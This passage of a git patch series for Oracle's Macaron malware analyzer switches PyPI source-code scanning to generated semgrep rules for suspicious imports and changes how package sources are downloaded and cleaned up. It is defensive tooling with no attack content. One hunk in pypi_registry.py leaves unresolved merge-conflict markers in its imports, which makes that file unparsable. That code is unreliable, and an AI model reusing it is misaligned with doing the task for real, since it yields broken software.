- # return None + with zipfile.ZipFile(source_file, "r") as sourcecode_zipfile: + for info in sourcecode_zipfile.infolist(): + if not info.is_dir(): + with sourcecode_zipfile.open(info) as file_obj: + sourcecode[info.filename] = file_obj.read() + + except (zipfile.BadZipFile, zipfile.LargeZipFile) as zipfile_error: + error_msg = f"Error reading source code zip file: {zipfile_error}" + logger.debug(error_msg) + raise InvalidHTTPResponseError(error_msg) from zipfile_error + else: - logger.debug("Unable to extract file: %s", file_name) + error_msg = f"Unable to extract source code from file {file_name}" + logger.debug(error_msg) + raise InvalidHTTPResponseError(error_msg) - logger.debug("Successfully fetch the source code from PyPI") - return py_files_content + return sourcecode def get_package_page(self, package_name: str) -> str | None: """Implement custom API to get package main page. @@ -389,6 +385,9 @@ class PyPIPackageJsonAsset: #: The asset content. package_json: dict + #: The source code of the package hosted on PyPI + package_sourcecode: dict + #: The size of the asset (in bytes). This attribute is added to match the AssetLocator #: protocol and is not used because pypi API registry does not provide it. @property @@ -518,16 +517,19 @@ def get_latest_release_upload_time(self) -> str | None: return upload_time return None - def get_sourcecode(self) -> dict[str, str] | None: - """Get source code of the package. + def download_sourcecode(self) -> bool: + """Get the source code of the package and store it in the package_sourcecode attribute. Returns ------- - dict[str, str] | None - The source code of each script in the package + bool + ``True`` if the source code is downloaded successfully; ``False`` if not. """ - url: str | None = self.get_sourcecode_url() + url = self.get_sourcecode_url() if url: - source_code: dict[str, str] | None = self.pypi_registry.fetch_sourcecode(url) - return source_code - return None + try: + self.package_sourcecode = self.pypi_registry.download_package_sourcecode(url) + return True + except InvalidHTTPResponseError as error: + logger.debug(error) + return False diff --git a/src/macaron/util.py b/src/macaron/util.py index d037ead10..96af86991 100644 --- a/src/macaron/util.py +++ b/src/macaron/util.py @@ -131,6 +131,7 @@ def send_get_http_raw( timeout: int | None = None, allow_redirects: bool = True, check_response_fails: bool = True, + stream: bool = False, ) -> Response | None: """Send the GET HTTP request with the given url and headers. @@ -148,6 +149,8 @@ def send_get_http_raw( Whether to allow redirects. Default: True. check_response_fails: bool When True, check if the response fails. Otherwise, return the response. + stream: bool + Indicates whether the response should be immediately downloaded (False) or streamed (True). Default: False. Returns ------- @@ -164,10 +167,7 @@ def send_get_http_raw( retry_counter = error_retries try: response = requests.get( - url=url, - headers=headers, - timeout=timeout, - allow_redirects=allow_redirects, + url=url, headers=headers, timeout=timeout, allow_redirects=allow_redirects, stream=stream ) except requests.exceptions.RequestException as error: logger.debug(error) From 735123b775afdfae211b4a3a2c775daa3b84bb59 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 20 Jan 2025 14:13:09 +1000 Subject: [PATCH 02/37] build: updated project to include semgrep as an experimental dependency --- Makefile | 2 +- pyproject.toml | 4 ++++ src/macaron/config/defaults.ini | 2 +- 3 files changed, 6 insertions(+), 2 deletions(-) diff --git a/Makefile b/Makefile index 029cdc163..dc39b88a6 100644 --- a/Makefile +++ b/Makefile @@ -206,7 +206,7 @@ upgrade: .venv/upgraded-on .venv/upgraded-on: pyproject.toml python -m pip install --upgrade pip python -m pip install --upgrade wheel - python -m pip install --upgrade --upgrade-strategy eager --editable .[actions,dev,docs,hooks,test,test-docker] + python -m pip install --upgrade --upgrade-strategy eager --editable .[actions,dev,docs,hooks,test,test-docker,experimental] $(MAKE) upgrade-quiet force-upgrade: rm -f .venv/upgraded-on diff --git a/pyproject.toml b/pyproject.toml index 6cae94f7a..fa86bf95e 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -107,6 +107,10 @@ test-docker = [ "ruamel.yaml >=0.18.6,<1.0.0", ] +experimental = [ + "semgrep == 1.102.0", +] + [project.urls] Homepage = "https://github.com/oracle/macaron" Changelog = "https://github.com/oracle/macaron/blob/main/CHANGELOG.md" diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index 99be0b7bd..acae98d55 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -602,5 +602,5 @@ epoch_threshold = 3 day_publish_error = 4 # yaml configuration file containing suspicious patterns. Can be full path or relative to -# folder where macaron is installed +# folder where macaron is installed. This will be normalised to the OS path type. suspicious_patterns_file = src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml From e3b44008ef89d3ce8a55eba3f13df10d87eb3245 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 23 Jan 2025 11:48:34 +1000 Subject: [PATCH 03/37] refactor: support for semgrep as the code analysis tool --- src/macaron/errors.py | 4 + .../sourcecode/pypi_sourcecode_analyzer.py | 231 ++++++------------ .../checks/detect_malicious_metadata_check.py | 5 +- .../package_registry/pypi_registry.py | 131 +++++++--- 4 files changed, 183 insertions(+), 188 deletions(-) diff --git a/src/macaron/errors.py b/src/macaron/errors.py index 34ab1da89..d5983a0bc 100644 --- a/src/macaron/errors.py +++ b/src/macaron/errors.py @@ -109,3 +109,7 @@ class HeuristicAnalyzerValueError(MacaronError): class LocalArtifactFinderError(MacaronError): """Happens when there is an error looking for local artifacts.""" + + +class SourceCodeError(MacaronError): + """Error for operations on package source code.""" diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index a616c8e57..e835f874d 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -11,16 +11,20 @@ import base64 import binascii import ipaddress +import json import logging import os import re -from dataclasses import dataclass +import subprocess # nosec +import tempfile +from collections import defaultdict +from typing import Any import yaml from macaron.config.defaults import defaults from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError -from macaron.json_tools import JsonType +from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset @@ -31,21 +35,6 @@ CALLS = "calls" -@dataclass(frozen=True) -class Import: - """Data class to hold information about extracted import statements. - - Name, alias, and module are referring to the following patterns of python import statements: - - [from ] import [as ] - """ - - name: str - alias: str | None - module: str | None - lineno: int - statement: str - - class PyPISourcecodeAnalyzer: """This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress. @@ -70,6 +59,7 @@ class PyPISourcecodeAnalyzer: def __init__(self) -> None: """Collect required data for analysing the source code.""" self.suspicious_patterns = self._load_defaults() + self.rule_files: list = [] def _load_defaults(self) -> dict[str, dict[str, list]]: """Load the suspicious pattern from suspicious_pattern.yaml. @@ -106,7 +96,7 @@ def _load_defaults(self) -> dict[str, dict[str, list]]: with open(filename, encoding="utf-8") as file: configured_patterns: dict[str, JsonType] = yaml.safe_load(file) except FileNotFoundError as file_error: - error_msg = f"Unable to open locate {filename}" + error_msg = f"Unable to locate {filename}" logger.debug(error_msg) raise ConfigurationError(error_msg) from file_error except yaml.YAMLError as yaml_error: @@ -162,44 +152,60 @@ def analyze_patterns(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[Heu HeuristicAnalyzerValueError if there is no source code available. """ - analysis_result: dict = {} + analysis_result: defaultdict = defaultdict(list) + semgrep_commands: list[str] = ["semgrep", "scan"] result: HeuristicResult = HeuristicResult.PASS - source_code = pypi_package_json.package_sourcecode - if not source_code: - error_msg = "Unable to retrieve PyPI package source code" + source_code_path = pypi_package_json.package_sourcecode_path + if not source_code_path: + error_msg = "Unable to retrieve PyPI package source code path" logger.debug(error_msg) raise HeuristicAnalyzerValueError(error_msg) - for filename, content in source_code.items(): - detail_info = {} + self._create_rules() + for rule_file in self.rule_files: + semgrep_commands.extend(["--config", rule_file.name]) + semgrep_commands.append(source_code_path) + with tempfile.NamedTemporaryFile(mode="w+", delete=True) as output_json_file: + semgrep_commands.append(f"--json-output={output_json_file.name}") try: - _ = ast.parse(content) - except (SyntaxError, ValueError) as ast_parse_error: - logger.debug("File %s cannot be parsed as a python file: %s", filename, ast_parse_error) - continue + process = subprocess.run(semgrep_commands, check=True, capture_output=True) # nosec + except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as semgrep_error: + error_msg = ( + f"Unable to run semgrep on {source_code_path} with arguments {semgrep_commands}: {semgrep_error}" + ) + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) from semgrep_error - imports = self._extract_imports(content) - import_names = set() - for i in imports: - if i.module: - import_names.add(".".join([i.module, i.name])) - import_names.add(i.name) + if process.returncode != 0: + error_msg = f"Error running semgrep on {source_code_path} with arguments" f" {process.args}" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) - for category, patterns in self.suspicious_patterns[IMPORTS].items(): - category_info = [] + semgrep_output = json.loads(output_json_file.read()) - suspicious_imports = set.intersection(import_names, set(patterns)) - if suspicious_imports: - category_info = [i for i in imports if i.name in suspicious_imports] - result = HeuristicResult.FAIL + if not semgrep_output: + return result, {} - detail_info[category] = category_info + semgrep_findings = json_extract(semgrep_output, ["results"], list) + if not semgrep_findings: + return result, {} - analysis_result[filename] = {IMPORTS: detail_info} + result = HeuristicResult.FAIL # some semgrep rules were triggered + for finding in semgrep_findings: + category = json_extract(finding, ["check_id"], str) + if not category: + continue - return result, analysis_result + file = json_extract(finding, ["path"], str) + start = json_extract(finding, ["start", "line"], int) + end = json_extract(finding, ["end", "line"], int) + analysis_result[category].append({"file": file, "start": start, "end": end}) + + self._clear_rules() + + return result, dict(analysis_result) def analyze_dataflow(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the source code of the package for malicious dataflow. @@ -253,122 +259,43 @@ def analyze_dataflow(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[Heu return result, analysis_result - def _extract_imports(self, content: str) -> set[Import]: - try: - return self._extract_imports_from_ast(content) - except SyntaxError: - return self._extract_imports_from_lines(content) + def _create_rules(self) -> None: + rule_list: list[dict[str, Any]] = [] + contents: dict = {} - def _extract_imports_from_ast(self, content: str) -> set[Import]: - """Extract imports from source code using the parsed AST. + if self.rule_files: + self._clear_rules() - Parameters - ---------- - source_content: str - The source code as a string. + # import rules + for category, patterns in self.suspicious_patterns[IMPORTS].items(): + rule: dict[str, Any] = {} + pattern_list: list = [] - Returns - ------- - set[str] - The set of imports. + rule["id"] = category + rule["severity"] = "ERROR" + rule["languages"] = ["python"] + rule["message"] = f"Detected suspicious imports from the '{category}' category" - Raises - ------ - SyntaxError - If the code could not be parsed. - """ - imports = set() - tree = ast.parse(content) - for node in ast.walk(tree): - if isinstance(node, ast.Import): - for alias in node.names: - imports.add(Import(alias.name, alias.asname, None, alias.lineno, "")) - elif isinstance(node, ast.ImportFrom): - module = node.module - if module: - _module = "." * node.level + module - for name in node.names: - imports.add(Import(name.name, name.asname, _module, name.lineno, "")) - return imports - - def _extract_imports_from_lines(self, content: str) -> set[Import]: - """Extract imports from source code using per line pattern matching. + for pattern in patterns: + pattern_list.append({"pattern": f"import {pattern}"}) + pattern_list.append({"pattern": f"from {pattern} import $X"}) + pattern_list.append({"pattern": f'__import__("{pattern}")'}) - Parameters - ---------- - source_content: str - The source code as a string. + rule["pattern-either"] = pattern_list + rule_list.append(rule) - Returns - ------- - set[str] - The list of imports. - """ - alias_pattern = r"\s+as\s+\w+(?:\.{0,1}\w+)*" - # Pattern for module aliases. - - module_name = r"\w+(?:\.{0,1}\w+" - # as described under pattern_import. - - pattern_import = ( - r"(?:import\s+)(" + module_name + r")*(?:" + alias_pattern + r")?" - r"(?:(?:\s*,\s*)(?:" + module_name + r")*(?:" + alias_pattern + r")?))*)(?:(?:\s|#).*)?" - ) - # Allows for a standard import statement. - # E.g.: import - # Where consists of one or more . - # Where consists of one or more words (a-z or 0-9 or underscore) separated by periods, - # with an optional alias. - # Where allows any character(s) either after a single space or a hash (#). - - pattern_from_import = ( - r"(?:from\s+)([.]*" - + module_name - + r")*)(?:\s+import\s+(\w+(?:\s+as\s+\w+)?(?:(?:\s*,\s*)(?:\w+(?:\s+as\s+\w+)?))*))" - ) - # Allows for a from import statement. - # E.g.: from import - # Where is as above, but can also be preceded by any number of periods. - # (Note only a single module can be placed here.) - # Where consists of one or more with optional aliases. - # Where is identical to except without any periods. - # Where requires at least one space followed by one or more word characters, plus - # any other characters following on from that. - - combined_pattern = f"^(?:{pattern_import})|(?:{pattern_from_import})$" - # The combined pattern creates two match groups: - # 1 - standard import statement. - # 2 - from import statement module. - # 3 - from import statement module components. - - imports = set() - for lineno, line in enumerate(content.splitlines()): - line.strip() - match = re.match(combined_pattern, line) - if not match: - continue + contents = {"rules": rule_list} + + with tempfile.NamedTemporaryFile( + "w", prefix=f"{IMPORTS}_", suffix=".yaml", delete=False + ) as import_patterns_file: + yaml.dump(contents, import_patterns_file) + self.rule_files.append(import_patterns_file) - if match.group(1): - # Standard import, handle commas and aliases if present. - splits = self._prune_aliased_lines(match.group(1), alias_pattern) - for split in splits: - imports.add(Import(split, None, None, lineno, "")) - elif match.group(2): - # From import - if match.group(3): - splits = self._prune_aliased_lines(match.group(3), alias_pattern) - for split in splits: - imports.add(Import(split, None, match.group(2), lineno, "")) - return imports - - def _prune_aliased_lines(self, text: str, alias_pattern: str) -> list[str]: - """Split the line on commas and remove any aliases from individual parts.""" - results = [] - splits = text.split(",") - for split in splits: - split = split.strip() - results.append(re.sub(alias_pattern, "", split)) - return results + def _clear_rules(self) -> None: + for file in self.rule_files: + file.close() + self.rule_files.clear() class DataFlowTracer(ast.NodeVisitor): diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 9e1e8dd42..b7d54e72a 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -279,7 +279,8 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: has_repository=ctx.component.repository is not None, pypi_registry=pypi_registry, package_json={}, - package_sourcecode={} + package_sourcecode={}, + package_sourcecode_path="" ) pypi_registry_info.metadata.append(pypi_package_json) @@ -310,6 +311,8 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: confidence = Confidence.LOW result_type = CheckResultType.FAILED + pypi_package_json.cleanup_sourcecode() + result_tables.append( MaliciousMetadataFacts( result=heuristic_results, diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index 04db1d2e2..4d6e1e125 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -5,10 +5,12 @@ import logging import os +import re +import shutil import tarfile import tempfile import urllib.parse -import zipfile +from collections.abc import Callable from dataclasses import dataclass from datetime import datetime @@ -17,7 +19,12 @@ from requests import RequestException from macaron.config.defaults import defaults +<<<<<<< HEAD from macaron.errors import ConfigurationError, InvalidHTTPResponseError +======= +from macaron.database.table_definitions import Component +from macaron.errors import ConfigurationError, InvalidHTTPResponseError, SourceCodeError +>>>>>>> 0de258c9 (refactor: support for semgrep as the code analysis tool) from macaron.json_tools import json_extract from macaron.malware_analyzer.datetime_parser import parse_datetime from macaron.slsa_analyzer.package_registry.package_registry import PackageRegistry @@ -159,7 +166,10 @@ def download_package_json(self, url: str) -> dict: return res_obj - def download_package_sourcecode(self, url: str) -> dict: + def _handle_temp_dir_clean(self, function: Callable, path: str, onerror: tuple) -> None: + raise SourceCodeError(f"Error removing with shutil. function={function}, " f"path={path}, excinfo={onerror}") + + def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: """Download the package source code from pypi registry. Parameters @@ -169,35 +179,55 @@ def download_package_sourcecode(self, url: str) -> dict: Returns ------- - dict[str: bytes] - A dictionary of filenames and file contents. + tuple[dict[str, bytes], str] + A dictionary of filenames and file contents, and the temp directory with the source code. """ sourcecode: dict = {} # Get name of file. _, _, file_name = url.rpartition("/") + package_name = re.sub(r"\.tar\.gz$", "", file_name) # temporary directory to unzip and read all source files - with tempfile.TemporaryDirectory() as temp_dir: - response = send_get_http_raw(url, stream=True) - if response is None: - error_msg = f"Unable to find package source code using URL: {url}" - logger.debug(error_msg) - raise InvalidHTTPResponseError(error_msg) + temp_dir = tempfile.mkdtemp(prefix=f"{package_name}_") + response = send_get_http_raw(url, stream=True) + if response is None: + error_msg = f"Unable to find package source code using URL: {url}" + logger.debug(error_msg) + try: + shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise InvalidHTTPResponseError(error_msg) from tempdir_exception + + raise InvalidHTTPResponseError(error_msg) - source_file = os.path.join(temp_dir, file_name) - with open(source_file, "wb") as file: + with tempfile.NamedTemporaryFile("+wb", delete=True) as source_file: + try: + for chunk in response.iter_content(): + source_file.write(chunk) + source_file.flush() + except RequestException as stream_error: + error_msg = f"Error while streaming source file: {stream_error}" + logger.debug(error_msg) try: - for chunk in response.iter_content(): - file.write(chunk) - except RequestException as stream_error: - error_msg = f"Error while streaming source file: {stream_error}" - logger.debug(error_msg) - raise InvalidHTTPResponseError from RequestException + shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + + raise InvalidHTTPResponseError(error_msg) from RequestException - if tarfile.is_tarfile(source_file): + if tarfile.is_tarfile(source_file.name): try: - with tarfile.open(source_file, "r:gz") as sourcecode_tar: + with tarfile.open(source_file.name, "r:gz") as sourcecode_tar: + sourcecode_tar.extractall(temp_dir, filter="data") + for member in sourcecode_tar.getmembers(): if member.isfile() and (file_obj := sourcecode_tar.extractfile(member)): sourcecode[member.name] = file_obj.read() @@ -205,27 +235,32 @@ def download_package_sourcecode(self, url: str) -> dict: except tarfile.ReadError as read_error: error_msg = f"Error reading source code tar file: {read_error}" logger.debug(error_msg) - raise InvalidHTTPResponseError(error_msg) from read_error + try: + shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) - elif zipfile.is_zipfile(source_file): - try: - with zipfile.ZipFile(source_file, "r") as sourcecode_zipfile: - for info in sourcecode_zipfile.infolist(): - if not info.is_dir(): - with sourcecode_zipfile.open(info) as file_obj: - sourcecode[info.filename] = file_obj.read() - - except (zipfile.BadZipFile, zipfile.LargeZipFile) as zipfile_error: - error_msg = f"Error reading source code zip file: {zipfile_error}" - logger.debug(error_msg) - raise InvalidHTTPResponseError(error_msg) from zipfile_error + raise InvalidHTTPResponseError(error_msg) from read_error else: error_msg = f"Unable to extract source code from file {file_name}" logger.debug(error_msg) + try: + shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise InvalidHTTPResponseError(error_msg) from tempdir_exception + raise InvalidHTTPResponseError(error_msg) - return sourcecode + logger.debug("Temporary download and unzip of %s stored in %s", file_name, temp_dir) + return sourcecode, temp_dir def get_package_page(self, package_name: str) -> str | None: """Implement custom API to get package main page. @@ -388,6 +423,9 @@ class PyPIPackageJsonAsset: #: The source code of the package hosted on PyPI package_sourcecode: dict + #: the source code temporary location name + package_sourcecode_path: str + #: The size of the asset (in bytes). This attribute is added to match the AssetLocator #: protocol and is not used because pypi API registry does not provide it. @property @@ -528,8 +566,31 @@ def download_sourcecode(self) -> bool: url = self.get_sourcecode_url() if url: try: - self.package_sourcecode = self.pypi_registry.download_package_sourcecode(url) + self.package_sourcecode, self.package_sourcecode_path = self.pypi_registry.download_package_sourcecode( + url + ) return True except InvalidHTTPResponseError as error: logger.debug(error) return False + + def _handle_temp_dir_clean(self, function: Callable, path: str, onerror: tuple) -> None: + raise SourceCodeError(f"Error removing with shutil. function={function}, " f"path={path}, excinfo={onerror}") + + def cleanup_sourcecode(self) -> None: + """ + Delete the temporary directory created when downloading the source code. + + The package source code is no longer accessible after this. + """ + if self.package_sourcecode_path: + try: + shutil.rmtree(self.package_sourcecode_path, onerror=self._handle_temp_dir_clean) + self.package_sourcecode_path = "" + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {self.package_sourcecode_path}" + f" for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise tempdir_exception From c2ef74eb829f3453641e3c834e27104a0e2b41b4 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 23 Jan 2025 14:31:28 +1000 Subject: [PATCH 04/37] fix: entire source code is no longer stored in memory --- .../sourcecode/pypi_sourcecode_analyzer.py | 47 +++---- .../package_registry/pypi_registry.py | 132 ++++++++++++++---- 2 files changed, 125 insertions(+), 54 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index e835f874d..d372c4fd3 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -23,7 +23,7 @@ import yaml from macaron.config.defaults import defaults -from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError, SourceCodeError from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset @@ -231,31 +231,30 @@ def analyze_dataflow(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[Heu analysis_result: dict = {} result: HeuristicResult = HeuristicResult.SKIP - source_code = pypi_package_json.package_sourcecode - if not source_code: + try: + for filename, content in pypi_package_json.iter_sourcecode(): + try: + _ = ast.parse(content.decode("utf-8")) + except (SyntaxError, ValueError) as ast_parse_error: + logger.debug("File %s cannot be parsed as a python file: %s", filename, ast_parse_error) + continue + + # tracer = DataFlowTracer() + # tracer.generate_symbol_table(content) + + # functioncall_analyzer = FunctionCallAnalyzer(self.suspicious_pattern, tracer) + # is_malware, detail_info = functioncall_analyzer.analyze(content) + # if is_malware: + # result = HeuristicResult.FAIL + + # # TODO: Currently, the result collector does not handle the situation that + # # multiple same filename. In the future, this will be replace with absolute path. + # if detail_info: + # analysis_result[filename] = detail_info + except SourceCodeError as sourcecode_error: error_msg = "Unable to retrieve PyPI package source code" logger.debug(error_msg) - raise HeuristicAnalyzerValueError(error_msg) - - for filename, content in source_code.items(): - try: - _ = ast.parse(content) - except (SyntaxError, ValueError) as ast_parse_error: - logger.debug("File %s cannot be parsed as a python file: %s", filename, ast_parse_error) - continue - - # tracer = DataFlowTracer() - # tracer.generate_symbol_table(content) - - # functioncall_analyzer = FunctionCallAnalyzer(self.suspicious_pattern, tracer) - # is_malware, detail_info = functioncall_analyzer.analyze(content) - # if is_malware: - # result = HeuristicResult.FAIL - - # # TODO: Currently, the result collector does not handle the situation that - # # multiple same filename. In the future, this will be replace with absolute path. - # if detail_info: - # analysis_result[filename] = detail_info + raise HeuristicAnalyzerValueError(error_msg) from sourcecode_error return result, analysis_result diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index 4d6e1e125..4fa5d1855 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -10,7 +10,7 @@ import tarfile import tempfile import urllib.parse -from collections.abc import Callable +from collections.abc import Callable, Iterator from dataclasses import dataclass from datetime import datetime @@ -33,6 +33,10 @@ logger: logging.Logger = logging.getLogger(__name__) +def _handle_temp_dir_clean(function: Callable, path: str, onerror: tuple) -> None: + raise SourceCodeError(f"Error removing with shutil. function={function}, " f"path={path}, excinfo={onerror}") + + class PyPIRegistry(PackageRegistry): """This class implements the pypi package registry.""" @@ -166,10 +170,7 @@ def download_package_json(self, url: str) -> dict: return res_obj - def _handle_temp_dir_clean(self, function: Callable, path: str, onerror: tuple) -> None: - raise SourceCodeError(f"Error removing with shutil. function={function}, " f"path={path}, excinfo={onerror}") - - def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: + def download_package_sourcecode(self, url: str) -> str: """Download the package source code from pypi registry. Parameters @@ -179,11 +180,14 @@ def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: Returns ------- - tuple[dict[str, bytes], str] - A dictionary of filenames and file contents, and the temp directory with the source code. - """ - sourcecode: dict = {} + str + The temp directory with the source code. + Raises + ------ + InvalidHTTPResponseError + If the HTTP request to the registry fails or an unexpected response is returned. + """ # Get name of file. _, _, file_name = url.rpartition("/") package_name = re.sub(r"\.tar\.gz$", "", file_name) @@ -195,7 +199,7 @@ def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: error_msg = f"Unable to find package source code using URL: {url}" logger.debug(error_msg) try: - shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) except SourceCodeError as tempdir_exception: tempdir_exception_msg = ( f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" @@ -214,7 +218,7 @@ def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: error_msg = f"Error while streaming source file: {stream_error}" logger.debug(error_msg) try: - shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) except SourceCodeError as tempdir_exception: tempdir_exception_msg = ( f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" @@ -228,15 +232,11 @@ def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: with tarfile.open(source_file.name, "r:gz") as sourcecode_tar: sourcecode_tar.extractall(temp_dir, filter="data") - for member in sourcecode_tar.getmembers(): - if member.isfile() and (file_obj := sourcecode_tar.extractfile(member)): - sourcecode[member.name] = file_obj.read() - except tarfile.ReadError as read_error: error_msg = f"Error reading source code tar file: {read_error}" logger.debug(error_msg) try: - shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) except SourceCodeError as tempdir_exception: tempdir_exception_msg = ( f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" @@ -245,11 +245,16 @@ def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: raise InvalidHTTPResponseError(error_msg) from read_error + extracted_dir = os.listdir(temp_dir) + if len(extracted_dir) == 1 and re.sub(".tar.gz$", "", file_name) == extracted_dir[0]: + # structure used package name and version as top-level directory + temp_dir = os.path.join(temp_dir, extracted_dir[0]) + else: error_msg = f"Unable to extract source code from file {file_name}" logger.debug(error_msg) try: - shutil.rmtree(temp_dir, onerror=self._handle_temp_dir_clean) + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) except SourceCodeError as tempdir_exception: tempdir_exception_msg = ( f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" @@ -260,7 +265,7 @@ def download_package_sourcecode(self, url: str) -> tuple[dict[str, bytes], str]: raise InvalidHTTPResponseError(error_msg) logger.debug("Temporary download and unzip of %s stored in %s", file_name, temp_dir) - return sourcecode, temp_dir + return temp_dir def get_package_page(self, package_name: str) -> str | None: """Implement custom API to get package main page. @@ -420,9 +425,6 @@ class PyPIPackageJsonAsset: #: The asset content. package_json: dict - #: The source code of the package hosted on PyPI - package_sourcecode: dict - #: the source code temporary location name package_sourcecode_path: str @@ -556,7 +558,7 @@ def get_latest_release_upload_time(self) -> str | None: return None def download_sourcecode(self) -> bool: - """Get the source code of the package and store it in the package_sourcecode attribute. + """Get the source code of the package and store it in a temporary directory. Returns ------- @@ -566,26 +568,22 @@ def download_sourcecode(self) -> bool: url = self.get_sourcecode_url() if url: try: - self.package_sourcecode, self.package_sourcecode_path = self.pypi_registry.download_package_sourcecode( - url - ) + self.package_sourcecode_path = self.pypi_registry.download_package_sourcecode(url) return True except InvalidHTTPResponseError as error: logger.debug(error) return False - def _handle_temp_dir_clean(self, function: Callable, path: str, onerror: tuple) -> None: - raise SourceCodeError(f"Error removing with shutil. function={function}, " f"path={path}, excinfo={onerror}") - def cleanup_sourcecode(self) -> None: """ Delete the temporary directory created when downloading the source code. - The package source code is no longer accessible after this. + The package source code is no longer accessible after this, and the package_sourcecode_path + attribute is set to an empty string. """ if self.package_sourcecode_path: try: - shutil.rmtree(self.package_sourcecode_path, onerror=self._handle_temp_dir_clean) + shutil.rmtree(self.package_sourcecode_path, onerror=_handle_temp_dir_clean) self.package_sourcecode_path = "" except SourceCodeError as tempdir_exception: tempdir_exception_msg = ( @@ -594,3 +592,77 @@ def cleanup_sourcecode(self) -> None: ) logger.debug(tempdir_exception_msg) raise tempdir_exception + + def get_sourcecode_file_contents(self, path: str) -> bytes: + """ + Get the contents of a single source code file specified by the path. + + The path can be relative to the package_sourcecode_path attribute, or an absolute path. + + Parameters + ---------- + path: str + The absolute or relative to package_sourcecode_path file path to open. + + Returns + ------- + bytes + The raw contents of the source code file. + + Raises + ------ + SourceCodeError + if the source 